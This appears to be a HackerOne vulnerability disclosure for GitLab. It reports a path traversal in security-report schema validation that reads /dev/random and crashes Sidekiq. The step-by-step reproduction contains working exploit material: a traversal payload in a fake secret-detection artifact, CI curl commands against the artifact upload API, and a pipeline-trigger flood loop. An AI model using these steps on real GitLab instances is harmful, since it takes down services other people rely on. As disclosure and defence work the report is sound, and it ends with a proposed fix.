Path Traversal leads to DoS and Restricted File Read through Report Artifact Parsing (Affects Gitlab.com)
HackerOne report #2401952 by pwnie
on 2024-03-05, assigned to @ngeorge1:
Report
Summary
lib/gitlab/ci/parsers/security/validators/schema_validator.rb
contains a File.join
that contains user controlled input (report_version):
def schema_path
# The schema version selection logic here is described in the user documentation:
# https://docs.gitlab.com/ee/user/application_security/#security-report-validation
report_declared_version = File.join(root_path, report_version, file_name)
return report_declared_version if File.file?(report_declared_version)
This value can be controlled by uploading a bogus artifact file named "gl-secret-detection-report.json" with artifact type "secret_detection" and using a version
JSON field with path traversals.
It's then passed to JSONSchemer.schema(pathname)
and used to validate the CI scan artifact. Since we control the schema that's used, we can use $ref
s to include external schemas. JSONSchemer
allows file system access, though not network access unless explicitly passed as an option. I thoroughly read the JSONSchemer code for any way to escalate this (dump sensitive JSON files by referencing them using $ref) and I don't think it's possible (I could be wrong). The reason for this is that JSONSchemer is conveniently returning errors during validation and Gitlab is also parsing them and returning them to the user:
schema_validation_errors = schema.validate(report_data).map { |error| JSONSchemer::Errors.pretty(error) }
This means if we could reference a sensitive JSON file and somehow get the validation to fail and include the values of the JSON file we'd be golden. Though the JSONSchemer code has a very short list of what i can return:
def pretty(error)
data_pointer, type, schema = error.values_at('data_pointer', 'type', 'schema')
location = data_pointer.empty? ? 'root' : "property '#{data_pointer}'"
case type
when 'required'
keys = error.fetch('details').fetch('missing_keys').join(', ')
"#{location} is missing required keys: #{keys}"
when 'null', 'string', 'boolean', 'integer', 'number', 'array', 'object'
"#{location} is not of type: #{type}"
when 'pattern'
"#{location} does not match pattern: #{schema.fetch('pattern')}"
when 'format'
"#{location} does not match format: #{schema.fetch('format')}"
when 'const'
"#{location} is not: #{schema.fetch('const').inspect}"
when 'enum'
"#{location} is not one of: #{schema.fetch('enum')}"
else
"#{location} is invalid: error_type=#{type}"
end
schema
would be the file we are referencing (any sensitive JSON file we want to leak), though since it obviously isn't a schema it's very hard to get anything useful from these errors. Though there is a vast array of JSON files on a given Omnibus installation many being log files that we probably can control and hence do something interesting.
root@gitlab:/# find . -name '*.json' 2>/dev/null | wc -l
913
Though I find that too painstakingly boring to pursue so I'll just leave it to you guys to decide whether or not this constitutes a file read at all.
The real issue I discovered is being able to hang a rails process and consume lots of ram rapidly:
.read(name, [length [, offset]][, opt]) ⇒ String
Opens the file, optionally seeks to the given offset, then returns length bytes (defaulting to the rest of the file). #read ensures the file is closed before returning.
By supplying /dev/random
as the target path. I've seen people rewarded pretty big bounties for server side ReDoS so that's why I decided to report this.
e.g. #416225 (closed)
Steps to reproduce
- Configure an Omnibus Gitlab instance with an Ultimate license
- Create a project
- Ensure the Gitlab instance has shared runners available or configure a runner for the project
- Ensure the runner can handle more than one build at a time (/etc/gitlab-runner/config.toml set concurrent = 10)
5.1 Edit the.gitlab-ci.yml
file in your newly created project to:
bogus_artifact:
script: |
curl -X POST -v -F "file=[@]gl-secret-detection-report.json" "YOUR_GITLAB_INSTANCE_URL/api/v4/jobs/$CI_JOB_ID/artifacts?artifact_format=raw&artifact_type=secret_detection&token=$CI_JOB_TOKEN"
5.2 Replace YOUR_GITLAB_INSTANCE_URL
with your Gitlab instance URL
6.1 Create a file locally and name it secret-detection-report-format.json
and set the contents to {"$ref": "/dev/random"}
6.2 Create a new issue in the project and upload the file in a comment
7. Calculate the hashed path of the uploaded file by calculating the SHA2 hash of the project ID (numeric ID like 34)
8. Construct the hashed path by taking the first 2 characters of the hash as the first directory, the second 2 characters as the second directory and the entire hash as the third, example is below. Then take the secret of the file you uploaded (copy the link URL in the comments and then copy just the 32 hex part of it) and append it to the constructed path so far: 4e/07/4e07408562bedb8b60ce05c1decfe3ad16b72230967de01f640b7e4729b49fce/725cc8b62466087c472932f7ce4b96de
9. Create a file in your new project with the following contents named gl-secret-detection-report.json
and replace YOUR_FULL_HASH_PATH
with the full path you just constructed :
{"version": "../../../../../../../../../../../../../../../../../../../../../../../../../var/opt/gitlab/gitlab-rails/uploads/[@]hashed/YOUR_FULL_HASH_PATH"}
- Go to settings/ci_cd in your project (settings -> CI/CD), look for Pipeline trigger tokens, add new token, copy the token and save it
- Execute the following command replacing the placeholders appropriately:
while true; do curl -X POST \
--fail \
-F token=YOUR_PIPELINE_TOKEN \
-F ref=main \
http://YOUR_GITLAB_INSTANCE/api/v4/projects/YOUR_PROJECT_ID/trigger/pipeline; done
- This should generate many pipelines that are then handled by the runners configured for the project. If you properly configured the runner or runners to run multiple builds at once, you should see an increase in memory usage on your Gitlab instance once the pipelines are completed. This is due to
/dev/random
being read during the artifact parsing service. - To verify that this is indeed crashing sidekiq (artifact parsing is ran as a worker after a pipeline is complete), you can do:
cat sidekiq/current | grep -i terminate
{"severity":"INFO","time":"2024-03-05T04:06:53.471Z","message":"A worker terminated, shutting down the cluster"}
{"severity":"INFO","time":"2024-03-05T04:08:56.919Z","message":"A worker terminated, shutting down the cluster"}
{"severity":"INFO","time":"2024-03-05T04:16:05.432Z","message":"A worker terminated, shutting down the cluster"}
{"severity":"INFO","time":"2024-03-05T04:17:28.958Z","message":"A worker terminated, shutting down the cluster"}
{"severity":"INFO","time":"2024-03-05T04:18:52.534Z","message":"A worker terminated, shutting down the cluster"}
{"severity":"INFO","time":"2024-03-05T04:25:56.008Z","message":"A worker terminated, shutting down the cluster"}
or obviously just view system resource usage rapidly increase then decrease when the sidekiq process is killed along with any jobs being handled.
14. Since this kills sidekiq clusters, this means you can disrupt any services being ran and to be ran. Essentially a sidekiq DoS. This makes Gitlab unusable.
Impact
DoS of Gitlab instance sidekiq clusters
Environment
GitLab Enterprise Edition v16.7.3-ee Omnibus Package
Impact
DoS of Gitlab instance sidekiq clusters
How To Reproduce
Please add reproducibility information to this section:
Implementation
- Add regex verification for
report_version
toGitlab::Ci::Parsers::Security::Validators
. Copy over schema format for consistency